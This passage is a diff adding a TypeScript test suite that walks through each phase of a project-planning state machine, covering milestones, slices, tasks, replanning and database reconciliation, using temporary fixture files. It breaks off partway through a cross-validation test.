+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  deriveState,
+  deriveStateFromDb,
+  isValidationTerminal,
+  isGhostMilestone,
+  invalidateStateCache,
+} from "../state.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  updateTaskStatus,
+  getAllMilestones,
+  insertGateRow,
+  getPendingSliceGateCount,
+} from "../gsd-db.ts";
+import { isClosedStatus } from "../status-guards.ts";
+import { clearPathCache } from "../paths.ts";
+
+// ─── Fixture Helpers ─────────────────────────────────────────────────────────
+
+const tempDirs: string[] = [];
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-walkthrough-"));
+  mkdirSync(join(base, ".gsd", "milestones"), { recursive: true });
+  tempDirs.push(base);
+  return base;
+}
+
+afterEach(() => {
+  for (const dir of tempDirs.splice(0)) {
+    try {
+      rmSync(dir, { recursive: true, force: true });
+    } catch { /* best effort */ }
+  }
+  try { closeDatabase(); } catch { /* may not be open */ }
+});
+
+function writeContext(base: string, mid: string, content: string): void {
+  const dir = join(base, ".gsd", "milestones", mid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${mid}-CONTEXT.md`), content);
+}
+
+function writeContextDraft(base: string, mid: string, content: string): void {
+  const dir = join(base, ".gsd", "milestones", mid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${mid}-CONTEXT-DRAFT.md`), content);
+}
+
+function writeRoadmap(base: string, mid: string, content: string): void {
+  const dir = join(base, ".gsd", "milestones", mid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${mid}-ROADMAP.md`), content);
+}
+
+function writePlan(base: string, mid: string, sid: string, content: string): void {
+  const dir = join(base, ".gsd", "milestones", mid, "slices", sid);
+  const tasksDir = join(dir, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  writeFileSync(join(dir, `${sid}-PLAN.md`), content);
+  // Create stub task plan files so deriveState doesn't fall back to planning
+  const taskMatches = content.matchAll(/\*\*(T\d+):/g);
+  for (const m of taskMatches) {
+    const tid = m[1];
+    writeFileSync(join(tasksDir, `${tid}-PLAN.md`), `# ${tid} Plan\n\nStub.\n`);
+  }
+}
+
+function writeTaskSummary(base: string, mid: string, sid: string, tid: string): void {
+  const tasksDir = join(base, ".gsd", "milestones", mid, "slices", sid, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  writeFileSync(join(tasksDir, `${tid}-SUMMARY.md`), [
+    `# ${tid} Summary`,
+    "",
+    "Task completed successfully.",
+  ].join("\n"));
+}
+
+function writeTaskSummaryWithBlocker(base: string, mid: string, sid: string, tid: string): void {
+  const tasksDir = join(base, ".gsd", "milestones", mid, "slices", sid, "tasks");
+  mkdirSync(tasksDir, { recursive: true });
+  writeFileSync(join(tasksDir, `${tid}-SUMMARY.md`), [
+    "---",
+    "blocker_discovered: true",
+    "---",
+    "",
+    `# ${tid} Summary`,
+    "",
+    "Blocker found during execution.",
+  ].join("\n"));
+}
+
+function writeSliceSummary(base: string, mid: string, sid: string): void {
+  const dir = join(base, ".gsd", "milestones", mid, "slices", sid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${sid}-SUMMARY.md`), `# ${sid} Summary\n\nSlice done.\n`);
+}
+
+function writeMilestoneSummary(base: string, mid: string): void {
+  const dir = join(base, ".gsd", "milestones", mid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${mid}-SUMMARY.md`), `# ${mid} Summary\n\nMilestone complete.\n`);
+}
+
+function writeMilestoneValidation(base: string, mid: string, verdict: string = "pass"): void {
+  const dir = join(base, ".gsd", "milestones", mid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${mid}-VALIDATION.md`), [
+    "---",
+    `verdict: ${verdict}`,
+    "remediation_round: 0",
+    "---",
+    "",
+    "# Validation",
+    "Validated.",
+  ].join("\n"));
+}
+
+function writeReplanTrigger(base: string, mid: string, sid: string): void {
+  const dir = join(base, ".gsd", "milestones", mid, "slices", sid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${sid}-REPLAN-TRIGGER.md`), "Triage replan triggered.\n");
+}
+
+function writeReplan(base: string, mid: string, sid: string): void {
+  const dir = join(base, ".gsd", "milestones", mid, "slices", sid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${sid}-REPLAN.md`), "# Replan\n\nReplan completed.\n");
+}
+
+function writeContinue(base: string, mid: string, sid: string): void {
+  const dir = join(base, ".gsd", "milestones", mid, "slices", sid);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, `${sid}-CONTINUE.md`), [
+    "---",
+    "milestone: " + mid,
+    "slice: " + sid,
+    "task: T01",
+    "status: interrupted",
+    "---",
+    "",
+    "# Continue",
+    "Resume from step 2.",
+  ].join("\n"));
+}
+
+/** Standard roadmap with one incomplete slice */
+function standardRoadmap(): string {
+  return [
+    "# M001: Test Milestone",
+    "",
+    "**Vision:** Test state machine.",
+    "",
+    "## Slices",
+    "",
+    "- [ ] **S01: First Slice** `risk:low` `depends:[]`",
+    "  > After this: slice done.",
+  ].join("\n");
+}
+
+/** Roadmap with one done slice */
+function doneSliceRoadmap(): string {
+  return [
+    "# M001: Test Milestone",
+    "",
+    "**Vision:** Test state machine.",
+    "",
+    "## Slices",
+    "",
+    "- [x] **S01: Done Slice** `risk:low` `depends:[]`",
+    "  > After this: slice done.",
+  ].join("\n");
+}
+
+/** Standard plan with two incomplete tasks */
+function standardPlan(): string {
+  return [
+    "# S01: First Slice",
+    "",
+    "**Goal:** Test.",
+    "**Demo:** Tests pass.",
+    "",
+    "## Tasks",
+    "",
+    "- [ ] **T01: First Task** `est:10m`",
+    "  First task description.",
+    "",
+    "- [ ] **T02: Second Task** `est:10m`",
+    "  Second task description.",
+  ].join("\n");
+}
+
+/** Plan with all tasks done */
+function allDonePlan(): string {
+  return [
+    "# S01: First Slice",
+    "",
+    "**Goal:** Test.",
+    "**Demo:** Tests pass.",
+    "",
+    "## Tasks",
+    "",
+    "- [x] **T01: First Task** `est:10m`",
+    "  First task done.",
+    "",
+    "- [x] **T02: Second Task** `est:10m`",
+    "  Second task done.",
+  ].join("\n");
+}
+
+/** Plan with one done, one incomplete task */
+function partialDonePlan(): string {
+  return [
+    "# S01: First Slice",
+    "",
+    "**Goal:** Test.",
+    "**Demo:** Tests pass.",
+    "",
+    "## Tasks",
+    "",
+    "- [x] **T01: First Task** `est:10m`",
+    "  First task done.",
+    "",
+    "- [ ] **T02: Second Task** `est:10m`",
+    "  Second task pending.",
+  ].join("\n");
+}
+
+// ═══════════════════════════════════════════════════════════════════════════════
+// PHASE 1: pre-planning
+// ═══════════════════════════════════════════════════════════════════════════════
+
+describe("state-machine-full-walkthrough", () => {
+
+  describe("Phase 1: pre-planning", () => {
+    test("empty milestones dir → pre-planning", async () => {
+      const base = createFixtureBase();
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "pre-planning");
+      assert.equal(state.activeMilestone, null);
+      assert.equal(state.activeSlice, null);
+      assert.equal(state.activeTask, null);
+      assert.deepStrictEqual(state.registry, []);
+    });
+
+    test("milestone with CONTEXT but no ROADMAP → pre-planning", async () => {
+      const base = createFixtureBase();
+      writeContext(base, "M001", "# M001: Test\n\nSome context.");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "pre-planning");
+      assert.ok(state.activeMilestone !== null, "activeMilestone should be set");
+      assert.equal(state.activeMilestone?.id, "M001");
+    });
+
+    test("roadmap with zero slices → pre-planning (not validating-milestone)", async () => {
+      const base = createFixtureBase();
+      writeContext(base, "M001", "# M001: Test\n\nContext.");
+      // Roadmap exists but has no slice entries
+      writeRoadmap(base, "M001", [
+        "# M001: Test Milestone",
+        "",
+        "**Vision:** Test.",
+        "",
+        "## Slices",
+        "",
+        "No slices defined yet.",
+      ].join("\n"));
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "pre-planning", "zero slices must NOT trigger validating-milestone (#2667)");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 2: needs-discussion
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 2: needs-discussion", () => {
+    test("CONTEXT-DRAFT exists, no CONTEXT → needs-discussion", async () => {
+      const base = createFixtureBase();
+      writeContextDraft(base, "M001", "# M001: Draft\n\nDraft context.");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "needs-discussion");
+      assert.ok(state.activeMilestone !== null);
+      assert.equal(state.activeMilestone?.id, "M001");
+    });
+
+    test("both CONTEXT-DRAFT and CONTEXT exist → NOT needs-discussion", async () => {
+      const base = createFixtureBase();
+      writeContext(base, "M001", "# M001: Real\n\nReal context.");
+      writeContextDraft(base, "M001", "# M001: Draft\n\nDraft context.");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.notEqual(state.phase, "needs-discussion", "CONTEXT should win over CONTEXT-DRAFT");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 3: discussing (auto-mode only)
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 3: discussing (auto-mode only)", () => {
+    test("discussing is NOT reachable from deriveState", async () => {
+      // discussing is set only by auto-mode, never by state derivation.
+      // Verify that CONTEXT-DRAFT → needs-discussion (not discussing).
+      const base = createFixtureBase();
+      writeContextDraft(base, "M001", "# M001: Draft\n\nDraft.");
+      invalidateStateCache();
+      const state = await deriveState(base);
+      assert.notEqual(state.phase, "discussing");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 4: researching (auto-mode only)
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 4: researching (auto-mode only)", () => {
+    test("researching is NOT reachable from deriveState", async () => {
+      const base = createFixtureBase();
+      writeContext(base, "M001", "# M001: Test\n\nContext.");
+      writeRoadmap(base, "M001", standardRoadmap());
+      invalidateStateCache();
+      const state = await deriveState(base);
+      assert.notEqual(state.phase, "researching");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 5: planning
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 5: planning", () => {
+    test("roadmap with slice, no PLAN file → planning", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "planning");
+      assert.ok(state.activeSlice !== null);
+      assert.equal(state.activeSlice?.id, "S01");
+    });
+
+    test("PLAN exists but zero tasks → planning", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      // Plan file with no task entries
+      const dir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+      mkdirSync(dir, { recursive: true });
+      writeFileSync(join(dir, "S01-PLAN.md"), [
+        "# S01: First Slice",
+        "",
+        "**Goal:** Test.",
+        "**Demo:** Tests pass.",
+        "",
+        "## Tasks",
+        "",
+        "No tasks defined yet.",
+      ].join("\n"));
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "planning", "plan with zero tasks should remain in planning");
+    });
+
+    test("PLAN with tasks but missing T##-PLAN.md files → planning", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      // Write plan file WITH tasks but WITHOUT stub T##-PLAN.md files
+      const dir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+      mkdirSync(join(dir, "tasks"), { recursive: true });
+      writeFileSync(join(dir, "S01-PLAN.md"), standardPlan());
+      // Intentionally do NOT create T01-PLAN.md or T02-PLAN.md
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "planning", "missing task plan files should stay in planning");
+    });
+
+    test("PLAN with all task plan files → NOT planning", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.notEqual(state.phase, "planning", "complete plan should advance past planning");
+      // Should be executing since there are incomplete tasks
+      assert.equal(state.phase, "executing");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 6: evaluating-gates (DB path only)
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 6: evaluating-gates", () => {
+    test("DB path: pending quality gates → evaluating-gates", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      // Set up milestone + slice + task in DB
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01: Task", status: "pending" });
+
+      // Write plan on disk (needed for state derivation)
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+
+      // Insert a pending quality gate
+      insertGateRow({ milestoneId: "M001", sliceId: "S01", gateId: "Q3", scope: "slice", status: "pending" });
+
+      const pending = getPendingSliceGateCount("M001", "S01");
+      assert.ok(pending > 0, "should have pending gates");
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.equal(state.phase, "evaluating-gates");
+    });
+
+    test("DB path: no pending gates → NOT evaluating-gates", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01: Task", status: "pending" });
+
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+
+      // No gate rows → getPendingSliceGateCount returns 0
+      const pending = getPendingSliceGateCount("M001", "S01");
+      assert.equal(pending, 0, "should have no pending gates");
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.notEqual(state.phase, "evaluating-gates");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 7: executing
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 7: executing", () => {
+    test("active task, no blockers → executing", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "executing");
+      assert.ok(state.activeTask !== null);
+      assert.equal(state.activeTask?.id, "T01");
+    });
+
+    test("active task with CONTINUE.md → executing with resume message", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+      writeContinue(base, "M001", "S01");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "executing");
+      assert.ok(
+        state.nextAction.toLowerCase().includes("resume") || state.nextAction.toLowerCase().includes("continue"),
+        "nextAction should mention resume/continue",
+      );
+    });
+
+    test("one task remaining among completed → executing (not summarizing)", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", partialDonePlan());
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "executing", "should be executing while tasks remain");
+      assert.equal(state.activeTask?.id, "T02", "active task should be T02");
+      assert.equal(state.progress?.tasks?.done, 1);
+      assert.equal(state.progress?.tasks?.total, 2);
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 8: verifying (auto-mode only)
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 8: verifying (auto-mode only)", () => {
+    test("verifying is NOT reachable from deriveState", async () => {
+      // verifying is set only by auto-mode verification gates.
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", allDonePlan());
+      invalidateStateCache();
+      const state = await deriveState(base);
+      assert.notEqual(state.phase, "verifying");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 9: summarizing
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 9: summarizing", () => {
+    test("all tasks done, slice not complete → summarizing", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", allDonePlan());
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "summarizing");
+      assert.ok(state.activeSlice !== null);
+      assert.equal(state.activeSlice?.id, "S01");
+      assert.equal(state.activeTask, null, "no active task when all done");
+      assert.equal(state.progress?.tasks?.done, 2);
+      assert.equal(state.progress?.tasks?.total, 2);
+    });
+
+    test("tasks reconciled via SUMMARY on disk → summarizing", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      // Plan says tasks incomplete (headings, no checkboxes) ...
+      const planContent = [
+        "# S01: First Slice",
+        "",
+        "**Goal:** Test.",
+        "**Demo:** Tests pass.",
+        "",
+        "## Tasks",
+        "",
+        "### T01: First Task",
+        "First task.",
+        "",
+        "### T02: Second Task",
+        "Second task.",
+      ].join("\n");
+      const dir = join(base, ".gsd", "milestones", "M001", "slices", "S01");
+      const tasksDir = join(dir, "tasks");
+      mkdirSync(tasksDir, { recursive: true });
+      writeFileSync(join(dir, "S01-PLAN.md"), planContent);
+      writeFileSync(join(tasksDir, "T01-PLAN.md"), "# T01 Plan\nStub.\n");
+      writeFileSync(join(tasksDir, "T02-PLAN.md"), "# T02 Plan\nStub.\n");
+
+      // ... but SUMMARY files exist on disk (reconciliation trigger)
+      writeTaskSummary(base, "M001", "S01", "T01");
+      writeTaskSummary(base, "M001", "S01", "T02");
+
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      // Reconciliation should mark both tasks done → summarizing
+      assert.equal(state.phase, "summarizing", "SUMMARY reconciliation should advance to summarizing");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 10: advancing (auto-mode only)
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 10: advancing (auto-mode only)", () => {
+    test("advancing is NOT reachable from deriveState", async () => {
+      // advancing is an internal auto-mode transition marker
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+      invalidateStateCache();
+      const state = await deriveState(base);
+      assert.notEqual(state.phase, "advancing");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 11: validating-milestone
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 11: validating-milestone", () => {
+    test("all slices done, no VALIDATION file → validating-milestone", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "validating-milestone");
+      assert.ok(state.activeMilestone !== null);
+    });
+
+    test("all slices done, VALIDATION with unparseable verdict → validating-milestone", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      // Write a validation file with no parseable verdict
+      const dir = join(base, ".gsd", "milestones", "M001");
+      mkdirSync(dir, { recursive: true });
+      writeFileSync(join(dir, "M001-VALIDATION.md"), "Just some text with no frontmatter verdict.");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "validating-milestone", "unparseable verdict should stay in validating");
+    });
+
+    test("all slices done, terminal verdict → NOT validating-milestone", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      writeMilestoneValidation(base, "M001", "pass");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.notEqual(state.phase, "validating-milestone");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 12: completing-milestone
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 12: completing-milestone", () => {
+    test("all slices done, validation terminal, no SUMMARY → completing-milestone", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      writeMilestoneValidation(base, "M001", "pass");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "completing-milestone");
+      assert.ok(state.activeMilestone !== null);
+    });
+
+    test("all slices done, validation terminal, SUMMARY exists → NOT completing-milestone", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      writeMilestoneValidation(base, "M001", "pass");
+      writeMilestoneSummary(base, "M001");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.notEqual(state.phase, "completing-milestone", "should be complete, not completing");
+      assert.equal(state.phase, "complete");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 13: replanning-slice
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 13: replanning-slice", () => {
+    test("filesystem: task with blocker_discovered, no REPLAN.md → replanning-slice", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      // T01 is done with blocker, T02 is pending
+      writePlan(base, "M001", "S01", partialDonePlan());
+      writeTaskSummaryWithBlocker(base, "M001", "S01", "T01");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "replanning-slice");
+      assert.ok(state.blockers.length > 0, "should have blocker details");
+    });
+
+    test("filesystem: REPLAN-TRIGGER.md exists, no REPLAN.md → replanning-slice", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+      writeReplanTrigger(base, "M001", "S01");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "replanning-slice");
+    });
+
+    test("filesystem: REPLAN-TRIGGER + REPLAN.md exists → NOT replanning-slice (loop guard)", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+      writeReplanTrigger(base, "M001", "S01");
+      writeReplan(base, "M001", "S01");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.notEqual(state.phase, "replanning-slice", "REPLAN.md loop guard should prevent re-entering replanning");
+      // Should fall through to executing
+      assert.equal(state.phase, "executing");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 14: complete
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 14: complete", () => {
+    test("single milestone with SUMMARY + VALIDATION → complete", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      writeMilestoneValidation(base, "M001", "pass");
+      writeMilestoneSummary(base, "M001");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "complete");
+      assert.equal(state.registry.length, 1);
+      assert.equal(state.registry[0]?.status, "complete");
+    });
+
+    test("all milestones complete → complete", async () => {
+      const base = createFixtureBase();
+      // M001: complete
+      writeRoadmap(base, "M001", doneSliceRoadmap());
+      writeMilestoneValidation(base, "M001", "pass");
+      writeMilestoneSummary(base, "M001");
+
+      // M002: also complete
+      writeRoadmap(base, "M002", [
+        "# M002: Second Milestone",
+        "",
+        "**Vision:** Test.",
+        "",
+        "## Slices",
+        "",
+        "- [x] **S01: Done** `risk:low` `depends:[]`",
+        "  > After this: done.",
+      ].join("\n"));
+      writeMilestoneValidation(base, "M002", "pass");
+      writeMilestoneSummary(base, "M002");
+
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "complete");
+      assert.equal(state.registry.length, 2);
+      assert.ok(state.registry.every(e => e.status === "complete"), "all registry entries should be complete");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 15: paused (auto-mode only)
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 15: paused (auto-mode only)", () => {
+    test("paused is NOT reachable from deriveState", async () => {
+      const base = createFixtureBase();
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+      invalidateStateCache();
+      const state = await deriveState(base);
+      assert.notEqual(state.phase, "paused");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // PHASE 16: blocked
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Phase 16: blocked", () => {
+    test("milestone with unmet dependency → blocked", async () => {
+      const base = createFixtureBase();
+      // M001 depends on M000 which doesn't exist — uses YAML frontmatter
+      writeContext(base, "M001", [
+        "---",
+        "depends_on:",
+        "  - M000",
+        "---",
+        "",
+        "# M001: Test",
+        "",
+        "Context.",
+      ].join("\n"));
+      writeRoadmap(base, "M001", [
+        "# M001: Test Milestone",
+        "",
+        "**Vision:** Test blocked.",
+        "",
+        "## Slices",
+        "",
+        "- [ ] **S01: Slice** `risk:low` `depends:[]`",
+        "  > After this: done.",
+      ].join("\n"));
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "blocked");
+      assert.ok(state.blockers.length > 0, "should have blockers");
+    });
+
+    test("no eligible slice (all deps unmet) → blocked at slice level", async () => {
+      const base = createFixtureBase();
+      // S01 depends on S00 which doesn't exist
+      writeRoadmap(base, "M001", [
+        "# M001: Test Milestone",
+        "",
+        "**Vision:** Test blocked slices.",
+        "",
+        "## Slices",
+        "",
+        "- [ ] **S01: First** `risk:low` `depends:[S00]`",
+        "  > After this: done.",
+      ].join("\n"));
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      assert.equal(state.phase, "blocked");
+      assert.ok(
+        state.blockers.some(b => b.includes("dependency") || b.includes("eligible")),
+        "blockers should mention dependency or eligibility",
+      );
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // RECONCILIATION
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Reconciliation", () => {
+    test("DB: task with SUMMARY on disk but DB says pending → reconciliation fixes status (#2514)", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01: Task", status: "pending" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "T02: Task", status: "pending" });
+
+      writeRoadmap(base, "M001", standardRoadmap());
+      writePlan(base, "M001", "S01", standardPlan());
+
+      // Write SUMMARY files on disk for both tasks (simulating session disconnect)
+      writeTaskSummary(base, "M001", "S01", "T01");
+      writeTaskSummary(base, "M001", "S01", "T02");
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      // Reconciliation should detect SUMMARY→DB mismatch and update
+      // All tasks done → summarizing (not executing)
+      assert.equal(state.phase, "summarizing", "reconciliation should advance past pending tasks");
+    });
+
+    test("empty DB with disk milestones → disk-to-DB sync (#2631)", async () => {
+      const base = createFixtureBase();
+      writeContext(base, "M001", "# M001: Test\n\nContext.");
+
+      // Open DB — milestones table starts empty
+      openDatabase(":memory:");
+      const before = getAllMilestones();
+      assert.equal(before.length, 0, "DB should start empty");
+
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      // After deriveState, DB should have the disk milestone
+      const after = getAllMilestones();
+      assert.ok(after.length > 0, "DB should have milestones after reconciliation");
+      assert.equal(after[0]!.id, "M001");
+      assert.ok(state.activeMilestone !== null);
+    });
+
+    test("ghost milestone (empty dir) → NOT in registry", async () => {
+      const base = createFixtureBase();
+      // Create empty milestone dir (ghost — no CONTEXT, ROADMAP, SUMMARY)
+      mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+      // Create a real milestone too
+      writeContext(base, "M002", "# M002: Real\n\nContext.");
+      invalidateStateCache();
+      const state = await deriveState(base);
+
+      // M001 (ghost) should not appear in registry
+      const m001 = state.registry.find(e => e.id === "M001");
+      assert.equal(m001, undefined, "ghost milestone should not appear in registry");
+      // M002 should be there
+      const m002 = state.registry.find(e => e.id === "M002");
+      assert.ok(m002 !== undefined, "real milestone should appear in registry");
+    });
+
+    test("ghost milestone detection helper", () => {
+      const base = createFixtureBase();
+      // Ghost: empty dir
+      mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+      clearPathCache();
+      assert.equal(isGhostMilestone(base, "M001"), true, "empty dir is ghost");
+
+      // Not ghost: has CONTEXT
+      writeContext(base, "M002", "# M002\n\nContext.");
+      clearPathCache();
+      assert.equal(isGhostMilestone(base, "M002"), false, "dir with CONTEXT is not ghost");
+    });
+  });
+
+  // ═══════════════════════════════════════════════════════════════════════════
+  // CROSS-VALIDATION
+  // ═══════════════════════════════════════════════════════════════════════════
+
+  describe("Cross-validation: DB vs filesystem", () => {
+    test("executing scenario produces same phase on both paths", async () => {
+      const base = createFixtureBase();
+      const dbPath = join(base, ".gsd", "gsd.db");
+      openDatabase(dbPath);
+
+      insertMilestone({ id: "M001", title: "M001: Test", status: "active" });
+      insertSlice({ id: "S01", milestoneId: "M001", title: "S01: Slice", status: "active", depends: [] });
+      insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", title: "T01: First", status: "pending" });
+      insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", title: "T02: Second", status: "pending" });
+
